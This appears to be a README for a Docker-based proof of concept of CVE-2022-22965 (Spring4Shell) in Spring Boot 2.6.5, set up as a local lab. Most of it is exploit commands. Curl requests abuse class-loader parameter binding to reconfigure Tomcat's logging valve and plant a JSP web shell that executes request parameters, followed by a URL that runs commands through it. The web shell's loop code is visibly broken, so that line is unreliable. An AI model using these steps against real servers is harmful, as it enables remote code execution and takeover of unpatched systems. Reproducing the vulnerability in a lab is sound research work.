# Spring Boot CVE-2022-22965
Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5

# Getting Started
1. Run `docker compose up --build` to build and start the vulnerable application.
2. Run `curl -H "Accept: text/html;" "http://localhost:8080/demo/sample?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&"` to changes Tomcat config valve.
3. Run `curl -H "Accept: text/html;" -H "code: <% in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/demo/x"` to create the web shell.
4. Open your browser and go to http://localhost:8080/shell.jsp?1337=id to start executing commands.